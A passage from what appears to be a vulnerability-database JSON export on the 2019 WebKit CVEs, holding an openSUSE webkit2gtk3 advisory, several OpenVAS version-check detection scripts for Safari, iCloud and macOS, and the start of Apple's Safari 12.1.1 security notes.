CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,\n CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8615,\n CVE-2019-8611, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623 (bsc#1135715).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1766=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1766=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-07-21T00:00:00", "type": "suse", "title": "Security update for webkit2gtk3 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623"], "modified": "2019-07-21T00:00:00", "id": "OPENSUSE-SU-2019:1766-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/OQE4VHBLMH2J7F26YN2UPX2X5S3MOQCL/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-08T12:24:46", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates (HT210123)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8608", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8619", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8623", "CVE-2019-8609", "CVE-2019-8595"], "modified": "2020-01-07T00:00:00", "id": "OPENVAS:1361412562310814892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814892", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814892\");\n script_version(\"2020-01-07T08:25:23+0000\");\n script_cve_id(\"CVE-2019-8607\", \"CVE-2019-6237\", \"CVE-2019-8571\", \"CVE-2019-8583\",\n \"CVE-2019-8584\", \"CVE-2019-8586\", \"CVE-2019-8587\", \"CVE-2019-8594\",\n \"CVE-2019-8595\", \"CVE-2019-8596\", \"CVE-2019-8597\", \"CVE-2019-8601\",\n \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\", \"CVE-2019-8611\",\n \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\", \"CVE-2019-8623\",\n \"CVE-2019-8628\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 08:25:23 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-05-14 10:44:48 +0530 (Tue, 14 May 2019)\");\n script_name(\"Apple Safari Security Updates (HT210123)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An out-of-bounds read issue which was addressed with improved input validation.\n\n - Multiple memory corruption issues which were addressed with improved memory handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to execute arbitrary code and read the process memory\n by processing maliciously crafted web content.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 12.1.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 12.1.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT210123\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\nsafPath = infos['location'];\n\nif(version_is_less(version:safVer, test_version:\"12.1.1\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"12.1.1\", install_path:safPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:54:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-07-22T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:1766-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8608", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8619", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-8597", "CVE-2019-8623", "CVE-2019-8609", "CVE-2019-8595"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852626", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852626\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-6237\", \"CVE-2019-8571\", \"CVE-2019-8583\", \"CVE-2019-8584\",\n \"CVE-2019-8586\", \"CVE-2019-8587\", \"CVE-2019-8594\", \"CVE-2019-8595\",\n \"CVE-2019-8596\", \"CVE-2019-8597\", \"CVE-2019-8601\", \"CVE-2019-8607\",\n \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\", \"CVE-2019-8611\",\n \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\", \"CVE-2019-8623\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-22 02:01:04 +0000 (Mon, 22 Jul 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:1766-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1766-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-07/msg00028.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:1766-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.24.2 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584,\n CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595,\n CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,\n CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8615,\n CVE-2019-8611, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623 (bsc#1135715).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1766=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1766=1\");\n\n script_tag(name:\"affected\", value:\"'webkit2gtk3' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-32bit-debuginfo~2.24.2~lp150.2.22.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-23T15:05:54", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-06-14T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates (HT210212)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8608", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8577", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8602", "CVE-2019-8594", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8619", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8623", "CVE-2019-8609", "CVE-2019-8595"], "modified": "2020-03-20T00:00:00", "id": "OPENVAS:1361412562310815218", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815218", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815218\");\n script_version(\"2020-03-20T06:19:59+0000\");\n script_cve_id(\"CVE-2019-8577\", \"CVE-2019-8600\", \"CVE-2019-8598\", \"CVE-2019-8602\",\n \"CVE-2019-8607\", \"CVE-2019-6237\", \"CVE-2019-8571\", \"CVE-2019-8583\",\n \"CVE-2019-8584\", \"CVE-2019-8586\", \"CVE-2019-8587\", \"CVE-2019-8594\",\n \"CVE-2019-8595\", \"CVE-2019-8596\", \"CVE-2019-8597\", \"CVE-2019-8601\",\n \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\", \"CVE-2019-8611\",\n \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\", \"CVE-2019-8623\",\n \"CVE-2019-8628\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-20 06:19:59 +0000 (Fri, 20 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-14 10:13:10 +0530 (Fri, 14 Jun 2019)\");\n script_name(\"Apple iCloud Security Updates (HT210212)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An input validation issue due to improper memory handling.\n\n - Multiple memory corruption issues due to improper input validation\n and memory handling.\n\n - An out-of-bounds read issue due to improper input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote\n attackers to gain elevated privileges, execute arbitrary code and read\n restricted memory.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 10.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 10.4 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT210212\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\nif(icVer =~ \"^10\\.\" && version_is_less(version:icVer, test_version:\"10.4\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"10.4\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-23T00:22:19", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "openvas", "title": "Apple MacOSX Security Updates (HT210119) - 01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12126", "CVE-2019-8568", "CVE-2019-8635", "CVE-2019-8608", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8577", "CVE-2019-8612", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8602", "CVE-2019-8560", "CVE-2019-8594", "CVE-2019-8585", "CVE-2019-8622", "CVE-2018-12127", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8616", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8634", "CVE-2019-8619", "CVE-2019-8589", "CVE-2019-8615", "CVE-2019-8571", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8623", "CVE-2019-11091", "CVE-2019-8576", "CVE-2019-8609", "CVE-2019-8595", "CVE-2018-12130"], "modified": "2019-05-22T00:00:00", "id": "OPENVAS:1361412562310814887", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814887", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814887\");\n script_version(\"2019-05-22T13:43:48+0000\");\n script_cve_id(\"CVE-2019-8568\", \"CVE-2019-8560\", \"CVE-2019-6237\", \"CVE-2019-8571\",\n \"CVE-2019-8583\", \"CVE-2019-8584\", \"CVE-2019-8586\", \"CVE-2019-8587\",\n \"CVE-2019-8594\", \"CVE-2019-8595\", \"CVE-2019-8596\", \"CVE-2019-8597\",\n \"CVE-2019-8601\", \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\",\n \"CVE-2019-8611\", \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\",\n \"CVE-2019-8623\", \"CVE-2019-8628\", \"CVE-2019-8600\", \"CVE-2019-8602\",\n \"CVE-2019-8607\", \"CVE-2019-8589\", \"CVE-2019-8585\", \"CVE-2019-8577\",\n \"CVE-2019-8576\", \"CVE-2019-8634\", \"CVE-2019-8635\", \"CVE-2019-8616\",\n \"CVE-2019-8598\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\",\n \"CVE-2019-11091\", \"CVE-2019-8612\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:43:48 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-14 10:43:07 +0530 (Tue, 14 May 2019)\");\n script_name(\"Apple MacOSX Security Updates (HT210119) - 01\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A validation issue in the handling of symlinks.\n\n - Multiple input validation issue with improper memory handling and\n input validation.\n\n - Multiple out-of-bounds read issues with improper input and bounds\n checking.\n\n - Multiple memory corruption issues addressed with improper input validation.\n\n - An authentication issue with improper state management.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to modify protected parts of the file system, read\n restricted memory or kernel memory, elevate privileges, execute arbitrary code\n with system privileges or cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.14.x through 10.14.4.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.14.5 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT210119\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.14\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"ssh_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer|| osVer !~ \"^10\\.14\"|| \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.14\", test_version2:\"10.14.4\"))\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.14.5\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2021-11-10T17:00:09", "description": "# About the security content of Safari 12.1.1\n\nThis document describes the security content of Safari 12.1.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## Safari 12.1.1\n\nReleased May 13, 2019\n\n**WebKit**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and included in macOS Mojave 10.14.5\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and included in macOS Mojave 10.14.5\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and 